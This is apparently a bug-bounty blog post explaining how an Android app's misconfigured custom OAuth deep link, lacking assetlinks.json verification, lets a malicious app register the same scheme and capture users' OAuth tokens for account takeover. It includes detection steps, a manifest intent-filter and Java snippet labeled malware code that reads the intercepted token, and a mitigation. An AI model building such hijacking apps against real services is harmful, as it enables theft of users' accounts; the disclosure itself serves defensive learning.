AGENDA:

. THINGS YOU SHOULD KNOW TO UNDERSTAND THE VULNERABILITY

. DESCRIPTION OF THIS VULNERABILITY

. STEPS TO IDENTIFY

. IMPACT

. CONCLUSION

THINGS TO KNOW TO UNDERSTAND THE VULNERABILITY

1. WHAT IS A DEEP LINK AND HOW DO DEEP LINKS WORK

2. A BASIC UNDERSTANDING ABOUT O-Auth

I REQUEST YOU TO READ MY PREVIOUS BLOG TO UNDERSTAND THE WORKING PRINCIPLE OF THIS VULNERABILITY.

DESCRIPTION :

THESE KINDS OF BUGS OCCUR IN ANY MOBILE APPLICATION INTEGRATED WITH O-AUTH AND CUSTOM DEEPLINK. IF AN APPLICATION TRUSTS THIS O-AUTH AND CUSTOM DEEP-LINK, THERE IS A POSSIBILITY TO EXPLOIT THIS VULNERABILITY.

MISCONFIGURED O-AUTH DEEPLINK WHICH LEADS TO ACCOUNT TAKEOVER

NOTE: THE APPLICATION NAME CANNOT BE DISCLOSED PUBLICLY. Let's consider the term “ vulnerable app” for a deep understanding of the entire content of this blog.

In this application there are using 3 ways of O-Auth login :

. Google OAuth

. Microsoft OAuth

.Apple ID OAuth

Let's consider this scenario,

When the user opens the vulnerable application and tries to login with OAuth functionality (specifically Microsoft O-Auth ) it triggers the default browser of your mobile and it asks for Microsoft credentials. On successful login, it will automatically redirect and trigger the application with the help of a custom deep link (this custom deep link contains the user’s OAuth token).

In the previous blog < link > I have already mentioned that some android applications are vulnerable to this attack when the deep link is not properly configured.

Action performed: If the previously mentioned deep link malware application is redesigned, it is possible to hijack the vulnerable application O-Auth deep link.

So Now the malware application is installed on my mobile, the same login process is repeated, but this time the malware application hijacked the deep link with a valid O-Auth token. That’s it by this process the malware application gets hijacked successfully.

For clear understanding :

This is an example of how deep-link looks like :

vulnerableapp://login?token=ffdryur6iukit7tu756

STEPS TO IDENTIFY :

1. CHECK FOR O-AUTH LOGIN IN ANY APPLICATION AND CHECK WHETHER IT TRIGGERS ANY MOBILE BROWSER APPLICATION WHEN YOU TRY TO LOGIN WITH O-AUTH.

2. CHECK WHETHER THE JSON FILE IS PRESENT OR NOT IN THAT PARTICULAR APPLICATION DOMAIN (i.e) https://vulnerable.com/.well-known/assetlinks.json. IF THIS FILE IS NOT PRESENT THEN IT MAY BE VULNERABLE.

3. CREATE THE MALWARE APPLICATION WITH THE SAME VULNERABLE APP DEEPLINK, NOW TRY TO LOGIN WITH O-AUTH.

MALWARE CODE

Integrate this in the android manifest.xml file with your vulnerable app deep link

<intent-filter>
  <data android:scheme="vulnerableapp" android:host="login" />
</intent-filter>

Main Activity.java code

@Override
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.main);    TextView text = (TextView) findViewById(R.id.tid);
    Intent intent = getIntent();
    String action = intent.getAction();
    Uri data = intent.getData();
    text.setText(data.toString());}

This code is used to get deep link data and set it to malware app-text view, malware app doesn't need any permission to perform this attack.

IMPACT:

USING THIS FLAW THERE IS A HIGH POSSIBILITY TO TAKEOVER THE ACCOUNT

CONCLUSION :

To secure this, kindly add the .well-known/assetlinks.json in the authorized domain. Any O-AUTH login activity should be performed within that application only but if it asks permission to enter credentials in any unknown third-party applications then it is not a safe one to log in.

I hope you understand the impact of this vulnerability. If you wish to learn about mobile app bug bounty, check out the link below

link

university link https://university.cappriciosec.com/

Credits

VULNERABILITY DISCOVERED By:- karthithehacker (Karthikeyan.V)

WRITER:- AGNES RUSALIYA

-Thank you